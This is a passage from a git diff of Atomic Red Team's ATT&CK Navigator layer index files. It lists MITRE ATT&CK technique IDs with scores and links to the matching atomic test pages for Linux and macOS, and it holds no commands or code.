Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1556.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1556","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 0a7bcf39..a869ee3d 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json @@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/